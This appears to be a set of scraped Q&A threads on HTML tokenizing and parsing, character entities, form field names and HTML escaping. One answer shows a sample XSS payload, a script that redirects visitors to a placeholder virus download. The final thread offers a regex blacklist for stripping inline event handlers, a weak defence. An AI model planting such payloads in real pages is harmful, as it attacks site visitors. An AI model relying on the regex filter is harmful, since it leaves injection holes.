How does a parser (for example, HTML) work? - html

For argument's sake lets assume a HTML parser.
I've read that it tokenizes everything first, and then parses it.
What does tokenize mean?
Does the parser read every character each, building up a multi dimensional array to store the structure?
For example, does it read a < and then begin to capture the element, and then once it meets a closing > (outside of an attribute) it is pushed onto a array stack somewhere?
I'm interested for the sake of knowing (I'm curious).
If I were to read through the source of something like HTML Purifier, would that give me a good idea of how HTML is parsed?

Tokenizing can be composed of a few steps, for example, if you have this html code:
<html>
<head>
<title>My HTML Page</title>
</head>
<body>
<p style="special">
This paragraph has special style
</p>
<p>
This paragraph is not special
</p>
</body>
</html>
the tokenizer may convert that string to a flat list of significant tokens, discarding whitespaces (thanks, SasQ for the correction):
["<", "html", ">",
"<", "head", ">",
"<", "title", ">", "My HTML Page", "</", "title", ">",
"</", "head", ">",
"<", "body", ">",
"<", "p", "style", "=", "\"", "special", "\"", ">",
"This paragraph has special style",
"</", "p", ">",
"<", "p", ">",
"This paragraph is not special",
"</", "p", ">",
"</", "body", ">",
"</", "html", ">"
]
there may be multiple tokenizing passes to convert a list of tokens to a list of even higher-level tokens like the following hypothetical HTML parser might do (which is still a flat list):
[("<html>", {}),
("<head>", {}),
("<title>", {}), "My HTML Page", "</title>",
"</head>",
("<body>", {}),
("<p>", {"style": "special"}),
"This paragraph has special style",
"</p>",
("<p>", {}),
"This paragraph is not special",
"</p>",
"</body>",
"</html>"
]
then the parser converts that list of tokens to form a tree or graph that represents the source text in a manner that is more convenient to access/manipulate by the program:
("<html>", {}, [
("<head>", {}, [
("<title>", {}, ["My HTML Page"]),
]),
("<body>", {}, [
("<p>", {"style": "special"}, ["This paragraph has special style"]),
("<p>", {}, ["This paragraph is not special"]),
]),
])
at this point, the parsing is complete; and it is then up to the user to interpret the tree, modify it, etc.

First of all, you should be aware that parsing HTML is particularly ugly -- HTML was in wide (and divergent) use before being standardized. This leads to all manner of ugliness, such as the standard specifying that some constructs aren't allowed, but then specifying required behavior for those constructs anyway.
Getting to your direct question: tokenization is roughly equivalent to taking English, and breaking it up into words. In English, most words are consecutive streams of letters, possibly including an apostrophe, hyphen, etc. Mostly words are surrounded by spaces, but a period, question mark, exclamation point, etc., can also signal the end of a word. Likewise for HTML (or whatever) you specify some rules about what can make up a token (word) in this language. The piece of code that breaks the input up into tokens is normally known as the lexer.
At least in a normal case, you do not break all the input up into tokens before you start parsing. Rather, the parser calls the lexer to get the next token when it needs one. When it's called, the lexer looks at enough of the input to find one token, delivers that to the parser, and no more of the input is tokenized until the next time the parser needs more input.
In a general way, you're right about how a parser works, but (at least in a typical parser) it uses a stack during the act of parsing a statement, but what it builds to represent a statement is normally a tree (and Abstract Syntax Tree, aka AST), not a multidimensional array.
Based on the complexity of parsing HTML, I'd reserve looking at a parser for it until you've read through a few others first. If you do some looking around, you should be able to find a fair number of parsers/lexers for things like mathematical expressions that are probably more suitable as an introduction (smaller, simpler, easier to understand, etc.)

Don't miss the W3C's notes on parsing HTML5.
For an interesting introduction to scanning/lexing, search the web for Efficient Generation of Table-Driven Scanners. It shows how scanning is ultimately driven by automata theory. A collection of regular expressions is transformed into a single NFA . The NFA is then transformed to a DFA to make state transitions deterministic. The paper then describes a method to transform the DFA into a transition table.
A key point: scanners use regular expression theory but likely don't use existing regular expression libraries. For better performance, state transitions are coded as giant case statements or in transition tables.
Scanners guarantee that correct words(tokens) are used. Parsers guarantee the words are used in the correct combination and order. Scanners use regular expression and automata theory. Parsers use grammar theory, especially context-free grammars.
A couple parsing resources:
http://www.cs.utk.edu/~eijkhout/594-LaTeX/handouts/parsing/parsing-tutorial.pdf
http://cryptodrm.engr.uconn.edu/c244lect/L2.pdf

HTML and XML syntax (and others based on SGML) are quite hard to parse and they don't fit well into the lexing scenario, because they're not regular. In the parsing theory, a regular grammar is the one with doesn't have any recursion, that is, self-similar, nested patterns, or parentheses-like wrappers which have to match each other. But HTML/XML/SGML-based languages does have nested patterns: tags could be nested. Syntax with nesting patterns is higher in level in the Chomsky's classification: it's context-free or even context-dependent.
But back to your question about lexer:
Each syntax consists of two kinds of symbols: non-terminal symbols (those which unwind into other syntax rules) and terminal symbols (those which are "atomic" - they are leafs of the syntax tree and don't unwind into anything else). Terminal symbols are often just the tokens. Tokens are pumped one by one from the lexer and matched to their corresponding terminal symbols.
Those terminal symbols (tokens) have often regular syntax, which is easier to recognize (and that's why it's factored out to the lexer, which is more specialized for regular grammars and could do it quicker than by using more general approach of non-regular grammars).
So, to write a lexer for HTML/XML/SGML-like language, you need to find parts of the syntax which are atomic enough and regular, to be dealt with easily by the lexer. And here the problem arises, because it's not at first obvious which parts are these. I struggled with this problem for a long time.
But Lie Ryan above have done a very good job in recognizing these parts. Bravo for him for that! The token types are following:
TagOpener: < lexeme, used for starting tags.
TagCloser: > lexeme, used for ending tags.
ClosingTagMarker: / lexeme used in closing tags.
Name: alphanumeric sequence starting with letter, used for tag names and attribute names.
Value: Text which can contain variety of different characters, spaces etc. Used for values of attributes.
Equals: = lexeme, used for separating attribute names from its values.
Quote: ' lexeme, used for enclosing attribute values.
DoubleQuote: " lexeme, used for enclosing attribute values.
PlainText: Any text not containing < character directly and not covered by the above types.
You can also have some tokens for entity references, like or &. Probably:
EntityReference: a lexeme consisting of & followed by some alphanumeric characters and ended with ;.
Why I used separate tokens for ' and " and not one token for attribute value? Because regular syntax couldn't recognize which of these characters should end the sequence - it depends on the character which started it (ending character have to match the starting character). This "parenthesizing" is considered non-regular syntax. So I promote it into a higher level - to the Parser. It'd be his job to match these tokens (starting and ending) together (or none at all, for simple attribute values not containing spaces).
Afterthought:
Unfortunately, some of these tokens may occur only inside other markup. So the use of lexical contexts is needed, which after all is another state machine controlling the state machines recognizing particular tokens. And that's why I've said that SGML-like languages don't fit well into the schema of lexical analysis.

This is how HTML 5 Parser works:

Related

Why these 5 (6?) characters are considered "unsafe" HTML characters?

In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &
" (double quote) is converted to "
' (single quote) is converted to ' (only if the flag ENT_QUOTES is set)
< (less than) is converted to <
> (greater than) is converted to >
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I sumbit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay wellt hen let's filter out some of the important characters in that attack:
< and > will be replaced with < and > and now suddenly our script isn't a script. It's just some html-looking text.
A similar situation arsises with a comment like
Something is <<wrong>> here.
Supposing a user used <<...>> to emphasize for some reason. Their comment would render is
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as & and " and < etc. So it's fairly easy for innocent-looking text to accidentally be an html entity and end up looking very different and very odd for a user.
Consider the comment
I really like #455 ó please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These chars Are unsafe because in html the <> define a tag. The "", and '' are used to surround attributes. the & is encoded because of the use in html entities. no other chars Should be encoded but they can be ex: the trade symbol can be made into ™ the US dollar sign can be made into &dollar; the euro can be € ANY emoji can be made out of a HTML entity (the name of the encoded things)you can find a explanation/examples here

Why is "&reg" being rendered as "®" without the bounding semicolon

I've been running into a problem that was revealed through our Google adwords-driven marketing campaign. One of the standard parameters used is "region". When a user searches and clicks on a sponsored link, Google generates a long URL to track the click and sends a bunch of stuff along in the referrer. We capture this for our records, and we've noticed that the "Region" parameter is coming through incorrectly. What should be
http://ravercats.com/meow?foo=bar&region=catnip
is instead coming through as:
http://ravercats.com/meow?foo=bar®ion=catnip
I've verified that this occurs in all browsers. It's my understanding that HTML entity syntax is defined as follows:
&VALUE;
where the leading boundary is the ampersand and the closing boundary is the semicolon. Seems straightforward enough. The problem is that this isn't being respected for the ® entity, and it's wreaking all kinds of havoc throughout our system.
Does anyone know why this is occurring? Is it a bug in the DTD? (I'm looking for the current HTML DTD to see if I can make sense of it) I'm trying to figure out what would be common across browsers to make this happen, thus my looking for the DTD.
Here is a proof you can use. Take this code, make an HTML file out of it and render it in a browser:
<html>
http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct
</html>
EDIT: To everyone who's suggesting that I need to escape the entire URL, the example URLs above are exactly that, examples. The real URL is coming directly from Google and I have no control over how it is constructed. These suggestions, while valid, don't answer the question: "Why is this happening".
Although valid character references always have a semicolon at the end, some invalid named character references without a semicolon are, for backward compatibility reasons, recognized by modern browsers' HTML parsers.
Either you know what that entire list is, or you follow the HTML5 rules for when & is valid without being escaped (e.g. when followed by a space) or otherwise always escape & as & whenever in doubt.
For reference, the full list of named character references that are recognized without a semicolon is:
AElig, AMP, Aacute, Acirc, Agrave, Aring, Atilde, Auml, COPY, Ccedil,
ETH, Eacute, Ecirc, Egrave, Euml, GT, Iacute, Icirc, Igrave, Iuml, LT,
Ntilde, Oacute, Ocirc, Ograve, Oslash, Otilde, Ouml, QUOT, REG, THORN,
Uacute, Ucirc, Ugrave, Uuml, Yacute, aacute, acirc, acute, aelig,
agrave, amp, aring, atilde, auml, brvbar, ccedil, cedil, cent, copy,
curren, deg, divide, eacute, ecirc, egrave, eth, euml, frac12, frac14,
frac34, gt, iacute, icirc, iexcl, igrave, iquest, iuml, laquo, lt,
macr, micro, middot, nbsp, not, ntilde, oacute, ocirc, ograve, ordf,
ordm, oslash, otilde, ouml, para, plusmn, pound, quot, raquo, reg,
sect, shy, sup1, sup2, sup3, szlig, thorn, times, uacute, ucirc,
ugrave, uml, uuml, yacute, yen, yuml
However, it should be noted that only when in an attribute value, named character references in the above list are not processed as such by conforming HTML5 parsers if the next character is a = or a alphanumeric ASCII character.
For the full list of named character references with or without ending semicolons, see here.
This is a very messy business and depends on context (text content vs. attribute value).
Formally, by HTML specs up to and including HTML 4.01, an entity reference may appear without trailing semicolon, if the next character is not a name character. So e.g. &region= would be syntactically correct but undefined, as entity region has not been defined. XHTML makes the trailing semicolon required.
Browsers have traditionally played by other rules, though. Due to the common syntax of query URLs, they parse e.g. href="http://ravercats.com/meow?foo=bar&region=catnip" so that &region is not treated as an entity reference but as just text data. And authors mostly used such constructs, even though they are formally incorrect.
Contrary to what the question seems to be saying, href="http://ravercats.com/meow?foo=bar&region=catnip" actually works well. Problems arise when the string is not in an attribute value but inside text content, which is rather uncommon: we don’t normally write URLs in text. In text, &region= gets processed so that &reg is recognized as an entity reference (for “®”) and the rest is just character data. Such odd behavior is being made official in HTML5 CR, where clause 8.2.4.69 Tokenizing character references describes the “double standard”:
If the character reference is being consumed as part of an attribute,
and the last character matched is not a ";" (U+003B) character, and
the next character is either a "=" (U+003D) character or in the range
ASCII digits, uppercase ASCII letters, or lowercase ASCII letters,
then, for historical reasons, all the characters that were matched
after the U+0026 AMPERSAND character (&) must be unconsumed, and
nothing is returned.
Thus, in an attribute value, even &reg= would not be treated as containing a character reference, and still less &region=. (But reg_test= is a different case, due to the underscore character.)
In text content, other rules apply. The construct &region= causes then a parse error (by HTML5 CR rules), but with well-defined error handling: &reg is recognized as a character reference.
Maybe try replacing your & as &? Ampersands are characters that must be escaped in HTML as well, because they are reserved to be used as parts of entities.
1: The following markup is invalid in the first place (use the W3C Markup Validation Service to verify):
In the above example, the & character should be encoded as &, like so:
2: Browsers are tolerant; they try to make sense out of broken HTML. In your case, all possibly valid HTML entities are converted to HTML entities.
Here is a simple solution and it may not work in all instances.
So from this:
http://ravercats.com/meow?status=Online&region=Atlantis
To This:
http://ravercats.com/meow?region=Atlantis&status=Online
Because the &reg as we know triggers the special character ®
Caveat: If you have no control over the order of your URL query string parameters then you'll have to change your variable name to something else.
Escape your output!
Simply enough, you need to encode the url format into html format for accurate representation (ideally you would do so with a template engine variable escaping function, but barring that, with htmlspecialchars($url) or htmlentities($url) in php).
See your test case and then the correctly encoded html at this jsfiddle:
http://jsfiddle.net/tchalvakspam/Fp3W6/
Inactive code here:
<div>
Unescaped:
<br>
http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct
</div>
<div>
Correctly escaped:
<br>
http://foo.com/bar?foo=bar&region=US&register=lowpass&reg_test=fail&trademark=correct
</div>
It seems to me that what you have received from google is not an actual URL but a variable which refers to a url (query-string). So, thats why it's being parsed as registration mark when rendered.
I would say, you owe to url-encode it and decode it whenever processing it. Like any other variable containing special entities.
To prevent this from happening you should encode urls, which replaces characters like the ampersand with a % and a hexadecimal number behind it in the url.

What characters are allowed in the HTML Name attribute inside input tag?

I have a PHP script that will generate <input>s dynamically, so I was wondering if I needed to filter any characters in the name attribute.
I know that the name has to start with a letter, but I don't know any other rules. I figure square brackets must be allowed, since PHP uses these to create arrays from form data. How about parentheses? Spaces?
Note, that not all characters are submitted for name attributes of form fields (even when using POST)!
White-space characters are trimmed and inner white-space characters as well the character . are replaced by _.
(Tested in Chrome 23, Firefox 13 and Internet Explorer 9, all Win7.)
Any character you can include in an [X]HTML file is fine to put in an <input name>. As Allain's comment says, <input name> is defined as containing CDATA, so the only things you can't put in there are the control codes and invalid codepoints that the underlying standard (SGML or XML) disallows.
Allain quoted W3 from the HTML4 spec:
Note. The "get" method restricts form data set values to ASCII characters. Only the "post" method (with enctype="multipart/form-data") is specified to cover the entire ISO10646 character set.
However this isn't really true in practice.
The theory is that application/x-www-form-urlencoded data doesn't have a mechanism to specify an encoding for the form's names or values, so using non-ASCII characters in either is “not specified” as working and you should use POSTed multipart/form-data instead.
Unfortunately, in the real world, no browser specifies an encoding for fields even when it theoretically could, in the subpart headers of a multipart/form-data POST request body. (I believe Mozilla tried to implement it once, but backed out as it broke servers.)
And no browser implements the astonishingly complex and ugly RFC2231 standard that would be necessary to insert encoded non-ASCII field names into the multipart's subpart headers. In any case, the HTML spec that defines multipart/form-data doesn't directly say that RFC2231 should be used, and, again, it would break servers if you tried.
So the reality of the situation is there is no way to know what encoding is being used for the names and values in a form submission, no matter what type of form it is. What browsers will do with field names and values that contain non-ASCII characters is the same for GET and both types of POST form: it encodes them using the encoding the page containing the form used. Non-ASCII GET form names are no more broken than everything else.
DLH:
So name has a different data type for than it does for other elements?
Actually the only element whose name attribute is not CDATA is <meta>. See the HTML4 spec's attribute list for all the different uses of name; it's an overloaded attribute name, having many different meanings on the different elements. This is generally considered a bad thing.
However, typically these days you would avoid name except on form fields (where it's a control name) and param (where it's a plugin-specific parameter identifier). That's only two meanings to grapple with. The old-school use of name for identifying elements like <form> or <a> on the page should be avoided (use id instead).
The only real restriction on what characters can appear in form control names is when a form is submitted with GET
"The "get" method restricts form data set values to ASCII characters." reference
There's a good thread on it here.
While Allain's comment did answer OP's direct question and bobince provided some brilliant in-depth information, I believe many people come here seeking answer to more specific question: "Can I use a dot character in form's input name attribute?"
As this thread came up as first result when I searched for this knowledge I guessed I may as well share what I found.
Firstly, Matthias' claimed that:
character . are replaced by _
This is untrue. I don't know if browser's actually did this kind of operation back in 2013 - though, I doubt that. Browsers send dot characters as they are(talking about POST data)! You can check it in developer tools of any decent browser.
Please, notice that tiny little comment by abluejelly, that probably is missed by many:
I'd like to note that this is a server-specific thing, not a browser thing. Tested on Win7 FF3/3.5/31, IE5/7/8/9/10/Edge, Chrome39, and Safari Windows 5, and all of them sent " test this.stuff" (four leading spaces) as the name in POST to the ASP.NET dev server bundled with VS2012.
I checked it with Apache HTTP server(v2.4.25) and indeed input name like "foo.bar" is changed to "foo_bar". But in a name like "foo[foo.bar]" that dot is not replaced by _!
My conclusion: You can use dots but I wouldn't use it as this may lead to some unexpected behaviours depending on HTTP server used.
Do you mean the id and name attributes of the HTML input tag?
If so, I'd be very tempted to restrict (or convert) allowed "input" name characters into only a-z (A-Z), 0-9 and a limited range of punctuation (".", ",", etc.), if only to limit the potential for XSS exploits, etc.
Additionally, why let the user control any aspect of the input tag? (Might it not ultimately be easier from a validation perspective to keep the input tag names are 'custom_1', 'custom_2', etc. and then map these as required.)

What's the HTML character entity for the # sign?

What's the HTML character entity for the # sign? I've looked around for "pound" (which keeps returning the currency), and "hash" and "number", but what I try doesn't seem to turn into the right character.
You can search it on the individual character at fileformat.info. Enter # as search string and the 1st hit will lead you to U+0023. Scroll a bit down to the 2nd table, Encodings, you'll see under each the following entries:
HTML Entity (decimal) #
HTML Entity (hex) #
For # we have &num;.
Bear in mind, though, it is a new entity (IE9 can't recognize it, for instance). For wide support, you'll have to resort, as said by others, the numerical references # and, in hex, &#x23.
If you need to find out others, there are some very useful tools around.
The "#" -- like most Unicode characters -- has no particular name assigned to it in the W3 list of
"Character entity references"
http://www.w3.org/TR/html4/sgml/entities.html
.
So in HTML it is either represented by itself as "#" or a numeric character entity "#" or "#" (without quotes), as described in
"HTML Document Representation"
http://www.w3.org/TR/html4/charset.html
.
Alas, all three of these are useless for escaping it in a URL.
To transmit a "#" character to the web server in a URL, you want to use "URL encoding" aka "percent encoding" as described in RFC 3986, and replace each "#" with a "%23" (without quotes).
There is no HTML character entity for the # character, as the character has no special meaning in HTML.
You have to use a character code entity like # if you wish to HTML encode it for some reason.
# or #
http://www.asciitable.com/ has information. Wikipedia also has pages for most unicode characters.
http://en.wikipedia.org/wiki/Number_sign
The numerical reference is #.
You can display "#" in some ways as shown below:
&num; or # or #
In addtion, you can display "♯" which is different from "#" in some ways as shown below:
♯ or ♯ or &sharp;
We've got some wild answers here and actually we might have to cut hairs to determine if it qualifies as an HTML Entity, but what I believe you're looking for is the named anchor.
This allows references to different sections within an HTML document via hyperlink and specifically uses the octothorp (hash symbol, number symbol, pound symbol)
exampleDomain.com/exampleSilo/examplePage.html#2ndBase
Would be an example of how it's used.
&num; is the best option because it is the only one that doesn't include the # (hash) in it. Supported by old browsers or not, it is the best practice going forward.
(What is the point of encoding something using the same symbol you are encoding?)

Cleaning all inline events from HTML tags

For HTML input, I want to neutralize all HTML elements that have inline js (onclick="..", onmouseout=".." etc).
I am thinking, isn't it enough to encode the following chars? =,(,)
So onclick="location.href='ggg.com'"
will become
onclick%3D"location.href%3D'ggg.com'"
What am I missing here?
Edit: I do need to accept active HTML (I can't escape it all or entities is it).
There's no simple method to accept HTML, but not scripts.
You have to parse HTML to DOM, remove all unwanted elements and attributes in DOM and generate new HTML.
It can't be done reliably with regular expressions.
on* attributes are not enough. Scripts can be embedded in style, src, href and other attributes.
If you're using PHP, then use HTML Purifier.
You probably have a couple of options... easiest way is to convert quotes, and possibly <> characters, to their HTML encoded equivalents (" etc.), which will result in the HTML code being displayed literally.
Tell me what server-side language are you using and I can point you towards more language-specific information, if you like. (For example, PHP has htmlspecialchars()[1]).
EDIT: I just actually read your question. Okay, you want to allow HTML through but no JavaScript? Well, for lack of a simple solution jumping to my mind, I suggest just using string replacement (regular expressions if you can, maybe?) to get rid of them entirely.
There are a finite set of event handler attributes in JavaScript. Couple that with the need for quotation marks and you're probably good.
For proof of concept, in Perl, you'd probably do something like this:
$myInput =~ s/on(mouseover|mouseout|click|focus|blur|[...])(\"[^\"]*\")|(\'[^\']*\')\s*//gi;
So, capture the event handler name (only some of which I included), then a quoted expression using either single or double quotes, have optional whitespace on the end, and replace the entire thing with nothing (i.e., delete it).
That won't work for something requiring more levels of quotation, though, since eventually you would come back to the original delimiters. Forgive the contrived and completely useless example:
onclick="eval('3+prompt("Enter a number: ")')"
In THAT case, you might want to write a loop that parses the string first by word (i.e., looking for the event handler name), then going character by character, keeping track of the number of quoting levels as you go and keeping track of the current delimiter:
Mark the index of the beginning of the handler name (the "o" in onclick, etc.)
Start with quoting level 0 (or 1 after you've processed the opening quotation delimiter).
If the current delimiter is " and you see ', then increase the quoting level by 1 and switch current delimiter to '.
If the current delimiter is " and you see ", decrease the quoting level by 1 and switch current delimiter to '.
If the current delimiter is ' and you see ", then increase the quoting level by 1 and switch current delimiter to '.
If the current delimiter is ' and you see ', decrease the quoting level by 1 and switch current delimiter to '.
If the quoting level gets back down to 0, then your string has ended. Mark the index of where the string ends.
Use a string manipulation function to cut out the substring from the first index to the last index.
It's a little more time-consuming, but it should theoretically work no matter what, assuming the HTML is well-formed. (That's a horrible assumption, but if it's not well-formed you could just reject the input anyway!)
[1] http://us3.php.net/manual/en/function.htmlspecialchars.php